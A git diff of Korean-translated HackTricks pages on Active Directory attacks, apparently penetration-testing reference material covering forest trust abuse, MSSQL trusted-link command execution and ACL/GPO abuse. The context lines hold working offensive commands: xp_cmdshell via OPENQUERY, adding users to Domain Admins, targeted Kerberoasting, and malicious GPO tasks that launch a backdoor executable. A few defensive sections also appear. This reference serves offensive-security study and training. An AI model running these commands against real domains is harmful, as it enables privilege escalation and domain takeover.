-- **액세스 제어 목록(ACL)**: 주체는 **ACL**에 지정될 수 있으며, 특히 **DACL** 내의 **ACE**로서 특정 리소스에 대한 접근을 제공합니다. ACL, DACL 및 ACE의 메커니즘에 대해 더 깊이 파고들고자 하는 분들을 위해, “[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)”라는 백서가 귀중한 자료입니다.
+- **외부 도메인 그룹 구성원 자격**: 주체는 외부 도메인 내의 그룹의 구성원이 될 수도 있습니다. 그러나 이 방법의 효과는 신뢰의 성격과 그룹의 범위에 따라 달라집니다.
+- **액세스 제어 목록(ACL)**: 주체는 **ACL**에 명시될 수 있으며, 특히 **DACL** 내의 **ACE**로서 특정 리소스에 대한 접근을 제공합니다. ACL, DACL 및 ACE의 메커니즘에 대해 더 깊이 파고들고자 하는 분들을 위해, "[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)"라는 백서가 귀중한 자료입니다.
 
 ### 자식-부모 포리스트 권한 상승
 ```
@@ -586,19 +586,19 @@ Configuration Naming Context (NC)를 악용하는 방법을 이해하는 것은
 
 **루트 DC 사이트에 GPO 연결**
 
-Configuration NC의 Sites 컨테이너에는 AD 포리스트 내 모든 도메인에 가입된 컴퓨터의 사이트에 대한 정보가 포함되어 있습니다. 모든 DC에서 SYSTEM 권한으로 작업함으로써 공격자는 GPO를 루트 DC 사이트에 연결할 수 있습니다. 이 작업은 이러한 사이트에 적용된 정책을 조작하여 루트 도메인을 손상시킬 수 있습니다.
+Configuration NC의 Sites 컨테이너에는 AD 포리스트 내 모든 도메인 가입 컴퓨터의 사이트에 대한 정보가 포함되어 있습니다. 모든 DC에서 SYSTEM 권한으로 작업함으로써 공격자는 GPO를 루트 DC 사이트에 연결할 수 있습니다. 이 작업은 이러한 사이트에 적용된 정책을 조작하여 루트 도메인을 잠재적으로 손상시킬 수 있습니다.
 
 자세한 정보는 [SID 필터 우회](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research)에 대한 연구를 탐색할 수 있습니다.
 
 **포리스트 내 모든 gMSA 손상**
 
-공격 벡터는 도메인 내 특권 gMSA를 대상으로 하는 것입니다. gMSA의 비밀번호를 계산하는 데 필수적인 KDS Root 키는 Configuration NC 내에 저장됩니다. 모든 DC에서 SYSTEM 권한을 사용하면 KDS Root 키에 접근하고 포리스트 내 모든 gMSA의 비밀번호를 계산할 수 있습니다.
+공격 벡터는 도메인 내 특권 gMSA를 목표로 하는 것입니다. gMSA의 비밀번호를 계산하는 데 필수적인 KDS Root 키는 Configuration NC 내에 저장됩니다. 모든 DC에서 SYSTEM 권한을 사용하면 KDS Root 키에 접근하고 포리스트 전역의 모든 gMSA에 대한 비밀번호를 계산할 수 있습니다.
 
 자세한 분석은 [Golden gMSA Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent)에 대한 논의에서 확인할 수 있습니다.
 
 **스키마 변경 공격**
 
-이 방법은 새로운 특권 AD 객체의 생성을 기다리는 인내가 필요합니다. SYSTEM 권한을 가진 공격자는 AD 스키마를 수정하여 모든 클래스에 대해 모든 사용자에게 완전한 제어 권한을 부여할 수 있습니다. 이는 새로 생성된 AD 객체에 대한 무단 접근 및 제어로 이어질 수 있습니다.
+이 방법은 새로운 특권 AD 객체의 생성을 기다리는 인내가 필요합니다. SYSTEM 권한으로 공격자는 AD 스키마를 수정하여 모든 클래스에 대해 모든 사용자에게 완전한 제어 권한을 부여할 수 있습니다. 이는 새로 생성된 AD 객체에 대한 무단 접근 및 제어로 이어질 수 있습니다.
 
 추가 읽기는 [스키마 변경 신뢰 공격](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)에서 확인할 수 있습니다.
 
@@ -619,7 +619,7 @@ TrustDirection  : Inbound          --> Inboud trust
 WhenCreated     : 2/19/2021 10:50:56 PM
 WhenChanged     : 2/19/2021 10:50:56 PM
 ```
-이 시나리오에서 **귀하의 도메인은 외부 도메인에 의해 신뢰받고 있습니다**, 이는 귀하에게 **확인되지 않은 권한**을 부여합니다. 귀하는 **귀하의 도메인에서 어떤 주체가 외부 도메인에 대해 어떤 접근 권한을 가지고 있는지** 찾아야 하며, 그 다음 이를 악용하려고 시도해야 합니다:
+이 시나리오에서 **귀하의 도메인은 외부 도메인에 의해 신뢰받고 있습니다**, 이는 귀하에게 **정해지지 않은 권한**을 부여합니다. 귀하는 **귀하의 도메인에서 외부 도메인에 대해 어떤 주체가 어떤 접근 권한을 가지고 있는지** 찾아야 하며, 그 다음 이를 악용하려고 시도해야 합니다:
 
 {{#ref}}
 external-forest-domain-oneway-inbound.md
@@ -637,9 +637,9 @@ TrustDirection  : Outbound        --> Outbound trust
 WhenCreated     : 2/19/2021 10:15:24 PM
 WhenChanged     : 2/19/2021 10:15:24 PM
 ```
-이 시나리오에서 **당신의 도메인**은 **다른 도메인**의 주체에게 **권한**을 **신뢰**하고 있습니다.
+이 시나리오에서 **당신의 도메인**은 **다른 도메인**의 주체에게 **특권**을 **신뢰**하고 있습니다.
 
-그러나 **도메인이 신뢰**될 때, 신뢰하는 도메인은 **예측 가능한 이름**을 가진 **사용자**를 **생성**하며, 이 사용자는 **신뢰된 비밀번호**를 **비밀번호**로 사용합니다. 이는 **신뢰하는 도메인의 사용자에 접근하여 신뢰된 도메인에 들어가** 이를 열거하고 더 많은 권한을 상승시킬 수 있음을 의미합니다:
+그러나 **도메인이 신뢰**될 때, 신뢰하는 도메인은 **예측 가능한 이름**을 가진 **사용자**를 **생성**하고 **신뢰된 비밀번호**를 **비밀번호로 사용**합니다. 이는 **신뢰하는 도메인의 사용자에 접근하여 신뢰된 도메인에 들어가** 이를 열거하고 더 많은 특권을 상승시키려는 것이 가능하다는 것을 의미합니다:
 
 {{#ref}}
 external-forest-domain-one-way-outbound.md
@@ -648,7 +648,7 @@ external-forest-domain-one-way-outbound.md
 신뢰된 도메인을 손상시키는 또 다른 방법은 도메인 신뢰의 **반대 방향**에 생성된 [**SQL 신뢰 링크**](abusing-ad-mssql.md#mssql-trusted-links)를 찾는 것입니다(이는 그리 흔하지 않습니다).
 
 신뢰된 도메인을 손상시키는 또 다른 방법은 **신뢰된 도메인에서 접근할 수 있는** 머신에서 대기하여 **RDP**를 통해 로그인하는 것입니다. 그런 다음 공격자는 RDP 세션 프로세스에 코드를 주입하고 **피해자의 원래 도메인에 접근**할 수 있습니다.\
-게다가, 만약 **피해자가 그의 하드 드라이브를 마운트했다면**, 공격자는 **RDP 세션** 프로세스에서 **하드 드라이브의 시작 폴더**에 **백도어**를 저장할 수 있습니다. 이 기술은 **RDPInception**이라고 불립니다.
+게다가, 만약 **피해자가 그의 하드 드라이브를 마운트**했다면, 공격자는 **RDP 세션** 프로세스에서 **하드 드라이브의 시작 폴더**에 **백도어**를 저장할 수 있습니다. 이 기술은 **RDPInception**이라고 불립니다.
 
 {{#ref}}
 rdp-sessions-abuse.md
@@ -658,7 +658,7 @@ rdp-sessions-abuse.md
 
 ### **SID 필터링:**
 
-- SID 히스토리 속성을 활용한 공격의 위험은 SID 필터링에 의해 완화되며, 이는 모든 상호 숲 신뢰에서 기본적으로 활성화되어 있습니다. 이는 마이크로소프트의 입장에 따라 숲을 보안 경계로 간주하고, 숲 내 신뢰가 안전하다는 가정에 기반합니다.
+- SID 히스토리 속성을 활용한 공격의 위험은 SID 필터링에 의해 완화되며, 이는 모든 상호 숲 신뢰에서 기본적으로 활성화되어 있습니다. 이는 Microsoft의 입장에 따라 숲을 보안 경계로 간주하고, 숲 내 신뢰가 안전하다는 가정에 기반합니다.
 - 그러나 주의할 점이 있습니다: SID 필터링은 애플리케이션과 사용자 접근을 방해할 수 있어 가끔 비활성화될 수 있습니다.
 
 ### **선택적 인증:**
@@ -672,19 +672,19 @@ rdp-sessions-abuse.md
 
 {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity" %}
 
-## 일반적인 방어책
+## 일반적인 방어 방법
 
 [**자격 증명을 보호하는 방법에 대해 더 알아보세요.**](../stealing-credentials/credentials-protections.md)\\
 
 ### **자격 증명 보호를 위한 방어 조치**
 
 - **도메인 관리자 제한**: 도메인 관리자는 도메인 컨트롤러에만 로그인할 수 있도록 권장하며, 다른 호스트에서의 사용은 피해야 합니다.
-- **서비스 계정 권한**: 보안을 유지하기 위해 서비스는 도메인 관리자(DA) 권한으로 실행되어서는 안 됩니다.
-- **임시 권한 제한**: DA 권한이 필요한 작업의 경우, 그 기간을 제한해야 합니다. 이는 다음과 같이 달성할 수 있습니다: `Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
+- **서비스 계정 특권**: 보안을 유지하기 위해 서비스는 도메인 관리자(DA) 특권으로 실행되어서는 안 됩니다.
+- **임시 특권 제한**: DA 특권이 필요한 작업의 경우, 그 기간은 제한되어야 합니다. 이는 다음과 같이 달성할 수 있습니다: `Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
 
 ### **기만 기술 구현**
 
-- 기만을 구현하는 것은 함정 설정을 포함하며, 만료되지 않거나 위임을 위해 신뢰된 것으로 표시된 비밀번호와 같은 기능을 가진 유령 사용자 또는 컴퓨터를 설정하는 것입니다. 구체적인 접근 방식은 특정 권한을 가진 사용자를 생성하거나 높은 권한 그룹에 추가하는 것을 포함합니다.
+- 기만을 구현하는 것은 함정 설정을 포함하며, 만료되지 않거나 위임을 위해 신뢰된 것으로 표시된 비밀번호와 같은 기능을 가진 유령 사용자 또는 컴퓨터를 설정하는 것입니다. 구체적인 접근 방식은 특정 권한을 가진 사용자를 생성하거나 높은 특권 그룹에 추가하는 것을 포함합니다.
 - 실용적인 예로는 다음과 같은 도구를 사용하는 것입니다: `Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
 - 기만 기술 배포에 대한 더 많은 정보는 [Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception)에서 확인할 수 있습니다.
 
diff --git a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index 702e7bb77..128ce59b0 100644
--- a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -1,4 +1,4 @@
-# MSSQL AD Abuse
+# MSSQL AD 남용
 
 {{#include ../../banners/hacktricks-training.md}}
 
@@ -148,7 +148,7 @@ MSSQL 호스트 내에서 **명령을 실행**하는 것도 가능할 수 있습
 Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
 # Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
 ```
-다음 섹션에서 수동으로 수행하는 방법을 확인하세요.
+다음 섹션에서 수동으로 수행하는 방법을 확인하십시오.
 
 ### MSSQL 기본 해킹 기법
 
@@ -158,7 +158,7 @@ Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResu
 
 ## MSSQL 신뢰 링크
 
-MSSQL 인스턴스가 다른 MSSQL 인스턴스에 의해 신뢰되는 경우(데이터베이스 링크). 사용자가 신뢰된 데이터베이스에 대한 권한을 가지고 있다면, 그는 **신뢰 관계를 사용하여 다른 인스턴스에서도 쿼리를 실행할 수 있습니다**. 이러한 신뢰는 연결될 수 있으며, 어느 시점에서 사용자는 명령을 실행할 수 있는 잘못 구성된 데이터베이스를 찾을 수 있습니다.
+MSSQL 인스턴스가 다른 MSSQL 인스턴스에 의해 신뢰받는 경우(데이터베이스 링크). 사용자가 신뢰된 데이터베이스에 대한 권한이 있는 경우, 그는 **신뢰 관계를 사용하여 다른 인스턴스에서도 쿼리를 실행할 수 있습니다**. 이러한 신뢰는 연결될 수 있으며, 어느 시점에서 사용자는 명령을 실행할 수 있는 잘못 구성된 데이터베이스를 찾을 수 있습니다.
 
 **데이터베이스 간의 링크는 포리스트 신뢰를 넘어 작동합니다.**
 
@@ -202,13 +202,13 @@ metasploit을 사용하여 신뢰할 수 있는 링크를 쉽게 확인할 수 
 msf> use exploit/windows/mssql/mssql_linkcrawler
 [msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
 ```
-메타스플로잇이 MSSQL에서 `openquery()` 함수만 악용하려고 시도한다는 점에 유의하세요 (따라서 `openquery()`로 명령을 실행할 수 없다면, 아래에서 더 자세히 설명하는 `EXECUTE` 방법을 **수동으로** 시도해야 합니다.)
+metasploit이 MSSQL에서 `openquery()` 함수만 악용하려고 시도한다는 점에 유의하세요 (따라서 `openquery()`로 명령을 실행할 수 없다면, 아래에서 더 자세히 설명하는 `EXECUTE` 방법을 **수동으로** 시도해야 합니다.)
 
 ### 수동 - Openquery()
 
 **Linux**에서 **sqsh**와 **mssqlclient.py**를 사용하여 MSSQL 콘솔 셸을 얻을 수 있습니다.
 
-**Windows**에서도 링크를 찾아 수동으로 명령을 실행할 수 있으며, **MSSQL 클라이언트**로 [**HeidiSQL**](https://www.heidisql.com)을 사용할 수 있습니다.
+**Windows**에서도 링크를 찾아 수동으로 명령을 실행할 수 있습니다 **MSSQL 클라이언트인** [**HeidiSQL**](https://www.heidisql.com)을 사용하여.
 
 _윈도우 인증을 사용하여 로그인:_
 
@@ -228,11 +228,11 @@ EXEC sp_linkedservers;
 select * from openquery("dcorp-sql1", 'select * from master..sysservers')
 ```
 > [!WARNING]
-> 더블 및 싱글 인용부호가 사용되는 위치를 확인하세요. 그렇게 사용하는 것이 중요합니다.
+> 더블 및 싱글 인용부호가 사용되는 위치를 확인하세요. 이렇게 사용하는 것이 중요합니다.
 
 ![](<../../images/image (643).png>)
 
-이 신뢰할 수 있는 링크 체인을 수동으로 무한히 계속할 수 있습니다.
+이 신뢰할 수 있는 링크 체인을 수동으로 영원히 계속할 수 있습니다.
 ```sql
 # First level RCE
 SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
index cf96d808e..a4d06066a 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
@@ -2,14 +2,14 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**이 페이지는 주로** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **와** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**의 기술 요약입니다. 더 자세한 내용은 원본 기사를 확인하세요.**
+**이 페이지는 주로** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **와** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**의 기술 요약입니다. 자세한 내용은 원본 기사를 확인하세요.**
 
 ## **사용자에 대한 GenericAll 권한**
 
 이 권한은 공격자에게 대상 사용자 계정에 대한 완전한 제어를 부여합니다. `Get-ObjectAcl` 명령을 사용하여 `GenericAll` 권한이 확인되면, 공격자는 다음을 수행할 수 있습니다:
 
 - **대상의 비밀번호 변경**: `net user <username> <password> /domain`을 사용하여 공격자는 사용자의 비밀번호를 재설정할 수 있습니다.
-- **타겟 Kerberoasting**: 사용자의 계정에 SPN을 할당하여 kerberoastable하게 만든 후, Rubeus와 targetedKerberoast.py를 사용하여 티켓 부여 티켓(TGT) 해시를 추출하고 크랙을 시도합니다.
+- **대상 Kerberoasting**: 사용자의 계정에 SPN을 할당하여 kerberoastable하게 만든 후, Rubeus와 targetedKerberoast.py를 사용하여 티켓 부여 티켓(TGT) 해시를 추출하고 크랙을 시도합니다.
 ```powershell
 Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
 .\Rubeus.exe kerberoast /user:<username> /nowrap
@@ -23,7 +23,7 @@ Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
 
 이 권한은 공격자가 `Domain Admins`와 같은 그룹에 `GenericAll` 권한이 있을 경우 그룹 멤버십을 조작할 수 있게 해줍니다. `Get-NetGroup`을 사용하여 그룹의 고유 이름을 식별한 후, 공격자는:
 
-- **자신을 Domain Admins 그룹에 추가**: 이는 직접 명령을 사용하거나 Active Directory 또는 PowerSploit와 같은 모듈을 사용하여 수행할 수 있습니다.
+- **자신을 Domain Admins 그룹에 추가**: 이는 직접 명령어를 사용하거나 Active Directory 또는 PowerSploit와 같은 모듈을 사용하여 수행할 수 있습니다.
 ```powershell
 net group "domain admins" spotless /add /domain
 Add-ADGroupMember -Identity "domain admins" -Members spotless
@@ -40,13 +40,13 @@ Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.
 
 사용자가 특정 그룹(예: `Domain Admins`)의 모든 객체에 대해 `WriteProperty` 권한을 가지고 있다면, 다음과 같은 작업을 수행할 수 있습니다:
 
-- **자신을 Domain Admins 그룹에 추가**: `net user`와 `Add-NetGroupUser` 명령을 결합하여 이 방법을 통해 도메인 내에서 권한 상승이 가능합니다.
+- **자신을 Domain Admins 그룹에 추가**: `net user`와 `Add-NetGroupUser` 명령을 결합하여 이 방법으로 도메인 내에서 권한 상승이 가능합니다.
 ```powershell
 net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
 ```
 ## **Self (Self-Membership) on Group**
 
-이 권한은 공격자가 `Domain Admins`와 같은 특정 그룹에 자신을 추가할 수 있게 해줍니다. 그룹 멤버십을 직접 조작하는 명령을 통해 가능합니다. 다음 명령 시퀀스를 사용하면 자기 추가가 가능합니다:
+이 권한은 공격자가 `Domain Admins`와 같은 특정 그룹에 자신을 추가할 수 있게 해줍니다. 다음 명령어 시퀀스를 사용하면 자기 추가가 가능합니다:
 ```powershell
 net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
 ```
@@ -59,7 +59,7 @@ net group "domain admins" spotless /add /domain
 ```
 ## **ForceChangePassword**
 
-`User-Force-Change-Password`에 대한 사용자의 `ExtendedRight`를 보유하면 현재 비밀번호를 알지 못해도 비밀번호를 재설정할 수 있습니다. 이 권한의 검증 및 악용은 PowerShell 또는 대체 명령줄 도구를 통해 수행할 수 있으며, 대화형 세션 및 비대화형 환경을 위한 원라이너를 포함하여 사용자의 비밀번호를 재설정하는 여러 방법을 제공합니다. 명령은 간단한 PowerShell 호출에서 Linux의 `rpcclient` 사용에 이르기까지 다양하여 공격 벡터의 다재다능함을 보여줍니다.
+`User-Force-Change-Password`에 대한 사용자의 `ExtendedRight`를 보유하면 현재 비밀번호를 알지 못하고도 비밀번호를 재설정할 수 있습니다. 이 권한의 검증 및 악용은 PowerShell 또는 대체 명령줄 도구를 통해 수행할 수 있으며, 대화형 세션 및 비대화형 환경을 위한 원라이너를 포함하여 사용자의 비밀번호를 재설정하는 여러 방법을 제공합니다. 명령은 간단한 PowerShell 호출에서 Linux의 `rpcclient` 사용에 이르기까지 다양하여 공격 벡터의 다재다능함을 보여줍니다.
 ```powershell
 Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
 Set-DomainUserPassword -Identity delegate -Verbose
@@ -112,52 +112,52 @@ DCSync 공격은 도메인에서 특정 복제 권한을 활용하여 도메인
 
 ### GPO 위임
 
-그룹 정책 개체(GPO)를 관리하기 위한 위임된 접근은 상당한 보안 위험을 초래할 수 있습니다. 예를 들어, `offense\spotless`와 같은 사용자가 GPO 관리 권한을 위임받으면 **WriteProperty**, **WriteDacl**, **WriteOwner**와 같은 권한을 가질 수 있습니다. 이러한 권한은 PowerView를 사용하여 악용될 수 있습니다: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
+그룹 정책 객체(GPO)를 관리하기 위한 위임된 접근은 상당한 보안 위험을 초래할 수 있습니다. 예를 들어, `offense\spotless`와 같은 사용자가 GPO 관리 권한을 위임받으면 **WriteProperty**, **WriteDacl**, **WriteOwner**와 같은 권한을 가질 수 있습니다. 이러한 권한은 PowerView를 사용하여 악의적인 목적으로 남용될 수 있습니다: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
 
 ### GPO 권한 열거
 
 잘못 구성된 GPO를 식별하기 위해 PowerSploit의 cmdlet을 연결하여 사용할 수 있습니다. 이를 통해 특정 사용자가 관리할 수 있는 GPO를 발견할 수 있습니다: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
 
-**적용된 정책이 있는 컴퓨터**: 특정 GPO가 적용된 컴퓨터를 확인할 수 있어 잠재적 영향 범위를 이해하는 데 도움이 됩니다. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
+**적용된 정책이 있는 컴퓨터**: 특정 GPO가 적용된 컴퓨터를 확인할 수 있으며, 이는 잠재적 영향 범위를 이해하는 데 도움이 됩니다. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
 
 **특정 컴퓨터에 적용된 정책**: 특정 컴퓨터에 적용된 정책을 보려면 `Get-DomainGPO`와 같은 명령을 사용할 수 있습니다.
 
 **적용된 정책이 있는 OU**: 특정 정책의 영향을 받는 조직 단위(OU)를 식별하기 위해 `Get-DomainOU`를 사용할 수 있습니다.
 
-### GPO 악용 - New-GPOImmediateTask
+### GPO 남용 - New-GPOImmediateTask
 
-잘못 구성된 GPO는 코드를 실행하기 위해 악용될 수 있으며, 예를 들어 즉시 예약된 작업을 생성하여 영향을 받는 머신의 로컬 관리자 그룹에 사용자를 추가함으로써 권한을 크게 상승시킬 수 있습니다:
+잘못 구성된 GPO는 즉시 예약된 작업을 생성하여 코드를 실행하는 데 악용될 수 있습니다. 이는 영향을 받는 머신에서 로컬 관리자 그룹에 사용자를 추가하여 권한을 크게 상승시킬 수 있습니다:
 ```powershell
 New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
 ```
 ### GroupPolicy 모듈 - GPO 남용
 
-GroupPolicy 모듈이 설치된 경우, 새로운 GPO를 생성하고 연결할 수 있으며, 영향을 받는 컴퓨터에서 백도어를 실행하기 위한 레지스트리 값과 같은 설정을 할 수 있습니다. 이 방법은 GPO가 업데이트되고 사용자가 컴퓨터에 로그인해야 실행됩니다.
+GroupPolicy 모듈이 설치된 경우, 새로운 GPO를 생성하고 연결할 수 있으며, 영향을 받는 컴퓨터에서 백도어를 실행하기 위한 레지스트리 값과 같은 설정을 할 수 있습니다. 이 방법은 GPO가 업데이트되고 사용자가 컴퓨터에 로그인해야 실행됩니다:
 ```powershell
 New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
 Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
 ```
 ### SharpGPOAbuse - GPO 악용
 
-SharpGPOAbuse는 새로운 GPO를 생성할 필요 없이 기존 GPO를 악용하여 작업을 추가하거나 설정을 수정하는 방법을 제공합니다. 이 도구는 변경 사항을 적용하기 전에 기존 GPO를 수정하거나 RSAT 도구를 사용하여 새로운 GPO를 생성해야 합니다.
+SharpGPOAbuse는 새로운 GPO를 생성할 필요 없이 기존 GPO를 악용하여 작업을 추가하거나 설정을 수정하는 방법을 제공합니다. 이 도구는 변경 사항을 적용하기 전에 기존 GPO를 수정하거나 RSAT 도구를 사용하여 새로운 GPO를 생성해야 합니다:
 ```bash
 .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging"
 ```
 ### 정책 업데이트 강제 적용
 
-GPO 업데이트는 일반적으로 약 90분마다 발생합니다. 이 프로세스를 가속화하기 위해, 특히 변경 사항을 적용한 후에, 대상 컴퓨터에서 `gpupdate /force` 명령을 사용하여 즉각적인 정책 업데이트를 강제할 수 있습니다. 이 명령은 GPO에 대한 모든 수정 사항이 다음 자동 업데이트 주기를 기다리지 않고 적용되도록 보장합니다.
+GPO 업데이트는 일반적으로 약 90분마다 발생합니다. 이 프로세스를 가속화하기 위해, 특히 변경 사항을 적용한 후에는 `gpupdate /force` 명령을 대상 컴퓨터에서 사용하여 즉각적인 정책 업데이트를 강제할 수 있습니다. 이 명령은 GPO에 대한 모든 수정 사항이 다음 자동 업데이트 주기를 기다리지 않고 적용되도록 보장합니다.
 
 ### 내부 작동
 
 주어진 GPO의 예약된 작업을 검사하면, `Misconfigured Policy`와 같은 작업이 추가된 것을 확인할 수 있습니다. 이러한 작업은 시스템 동작을 수정하거나 권한을 상승시키기 위한 스크립트 또는 명령줄 도구를 통해 생성됩니다.
 
-`New-GPOImmediateTask`에 의해 생성된 XML 구성 파일에 표시된 작업의 구조는 예약된 작업의 세부 사항을 설명합니다 - 실행할 명령과 그 트리거를 포함합니다. 이 파일은 GPO 내에서 예약된 작업이 정의되고 관리되는 방식을 나타내며, 정책 집행의 일환으로 임의의 명령이나 스크립트를 실행하는 방법을 제공합니다.
+`New-GPOImmediateTask`에 의해 생성된 XML 구성 파일에 표시된 작업의 구조는 예약된 작업의 세부 사항을 설명합니다 - 실행할 명령과 그 트리거를 포함합니다. 이 파일은 GPO 내에서 예약된 작업이 어떻게 정의되고 관리되는지를 나타내며, 정책 집행의 일환으로 임의의 명령이나 스크립트를 실행하는 방법을 제공합니다.
 
 ### 사용자 및 그룹
 
-GPO는 또한 대상 시스템에서 사용자 및 그룹 구성원의 조작을 허용합니다. 사용자 및 그룹 정책 파일을 직접 편집함으로써, 공격자는 로컬 `administrators` 그룹과 같은 특권 그룹에 사용자를 추가할 수 있습니다. 이는 GPO 관리 권한의 위임을 통해 가능하며, 이를 통해 정책 파일을 수정하여 새로운 사용자를 포함하거나 그룹 구성원을 변경할 수 있습니다.
+GPO는 또한 대상 시스템에서 사용자 및 그룹 구성원의 조작을 허용합니다. 사용자 및 그룹 정책 파일을 직접 편집함으로써 공격자는 로컬 `administrators` 그룹과 같은 특권 그룹에 사용자를 추가할 수 있습니다. 이는 GPO 관리 권한의 위임을 통해 가능하며, 이를 통해 정책 파일을 수정하여 새로운 사용자를 포함하거나 그룹 구성원을 변경할 수 있습니다.
 
-사용자 및 그룹에 대한 XML 구성 파일은 이러한 변경 사항이 어떻게 구현되는지를 설명합니다. 이 파일에 항목을 추가함으로써, 특정 사용자에게 영향을 받는 시스템에서 상승된 권한을 부여할 수 있습니다. 이 방법은 GPO 조작을 통한 권한 상승에 대한 직접적인 접근 방식을 제공합니다.
+사용자 및 그룹에 대한 XML 구성 파일은 이러한 변경 사항이 어떻게 구현되는지를 설명합니다. 이 파일에 항목을 추가함으로써 특정 사용자에게 영향을 받는 시스템에서 상승된 권한을 부여할 수 있습니다. 이 방법은 GPO 조작을 통한 권한 상승에 대한 직접적인 접근 방식을 제공합니다.
 
 또한, 로그온/로그오프 스크립트를 활용하거나, 자동 실행을 위한 레지스트리 키를 수정하거나, .msi 파일을 통해 소프트웨어를 설치하거나, 서비스 구성을 편집하는 등의 코드를 실행하거나 지속성을 유지하기 위한 추가 방법도 고려될 수 있습니다. 이러한 기술은 GPO의 남용을 통해 접근을 유지하고 대상 시스템을 제어하는 다양한 경로를 제공합니다.
 
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
index ae26c72b9..c2993c286 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
@@ -8,16 +8,16 @@
 
 **요약**: 사용자의 **msDS-KeyCredentialLink** 속성에 쓸 수 있다면, 해당 객체의 **NT 해시**를 가져올 수 있습니다.
 
-게시물에서는 **공개-개인 키 인증 자격 증명**을 설정하여 대상의 NTLM 해시를 포함하는 고유한 **서비스 티켓**을 획득하는 방법이 설명되어 있습니다. 이 과정에는 암호화된 NTLM_SUPPLEMENTAL_CREDENTIAL이 포함된 권한 속성 인증서(PAC)가 포함되며, 이는 복호화할 수 있습니다.
